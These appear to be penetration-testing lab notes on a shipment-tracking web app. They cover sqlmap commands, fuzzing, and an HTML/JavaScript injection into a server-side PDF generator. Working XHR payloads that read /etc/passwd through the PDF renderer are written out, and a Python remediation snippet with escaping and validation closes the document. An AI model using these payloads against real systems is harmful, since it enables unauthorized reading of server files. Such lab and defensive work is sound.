## `tracking.inlanefreight.local`
- only functionality looks like entry of a tracking number ![[images/Pasted image 20260628161924.png]]
- random entry: `dfsdfsdfds` entered as part of a POST request and returned a PDF ![[images/Pasted image 20260628195223.png]]
- `request:response` in Burp ![[images/Pasted image 20260628195303.png]]
### SQLi
- try `sqlmap` on `insert` parameter ![[images/Pasted image 20260628201022.png]]
- try again without an injection point
```bash
sqlmap -r tracking.req --batch --level=5 --risk=3
```
- possible SQLi on `handle` parameter ![[images/Pasted image 20260628212043.png]]
- mark injection point and limit to boolean based blind
- super slow
### fuzzing
- directory ![[images/Pasted image 20260630171736.png]]
- page ![[images/Pasted image 20260630171857.png]]
### testing
- whatever I enter in the tracking field shows up in the PDF output, like `test` ![[images/Pasted image 20260630171057.png]]
- if I try `test"<script>alert(window.origin)</script>` the script portion is cut off ![[images/Pasted image 20260630171848.png]]
- if I try `test"<plaintext>` I get an interesting output ![[images/Pasted image 20260630172010.png]]
- it must be executing the JavaScript
- Google: "pdf injection file read"
- try this payload for XHR/javascript execution in DOM > not getting what I expected
```html
<script>
  xhr = new XMLHttpRequest();
  xhr.onload = function() {
    // Send responseText to attacker-controlled server
  };
  xhr.open("GET", "file:///etc/passwd");
  xhr.send();
</script>
```
![[images/Pasted image 20260630185144.png]]
- try a modified payload > the above has a blank placeholder
```html
<script>
  var xhr = new XMLHttpRequest();
  xhr.onload = function() {
    document.write(this.responseText);
  };
  xhr.open("GET", "file:///etc/passwd", false);
  xhr.send();
</script>
```
- there we go ![[images/Pasted image 20260630192013.png]]
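
Remediation side of the finding above, as an added example (not code from the target application or from these notes): the tracking value is HTML-encoded, and optionally format-checked, before it reaches the PDF renderer, and a small parser check shows which tags the raw value introduces. `TEMPLATE`, `TRACKING_RE` and all function names are hypothetical; the test strings are the ones already tried in the field.

```python
import html
import re
from html.parser import HTMLParser

# Assumed format for a valid tracking number (hypothetical; not from the notes).
TRACKING_RE = re.compile(r"[A-Za-z0-9-]{1,32}")
# Hypothetical stand-in for the HTML the server hands to its PDF renderer.
TEMPLATE = "<html><body><h1>Shipment</h1><p>Tracking number: {value}</p></body></html>"


class _TagCollector(HTMLParser):
    """Records the name of every start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)


def _tags(document):
    collector = _TagCollector()
    collector.feed(document)
    collector.close()
    return collector.tags


def render_unsafe(value):
    """Before: the field is concatenated into the markup as-is."""
    return TEMPLATE.format(value=value)


def render_escaped(value):
    """After: the field is HTML-encoded, so the renderer sees text only."""
    return TEMPLATE.format(value=html.escape(value, quote=True))


def render_strict(value):
    """After, stricter: reject anything outside the assumed format, then encode."""
    if not TRACKING_RE.fullmatch(value):
        raise ValueError("invalid tracking number")
    return render_escaped(value)


def injected_tags(document):
    """Tags in the rendered document that the template itself does not contain."""
    return sorted(_tags(document) - _tags(TEMPLATE.format(value="")))
```

Encoding closes the injection itself; turning off script execution and local file access in the PDF renderer is a separate layer on top of it.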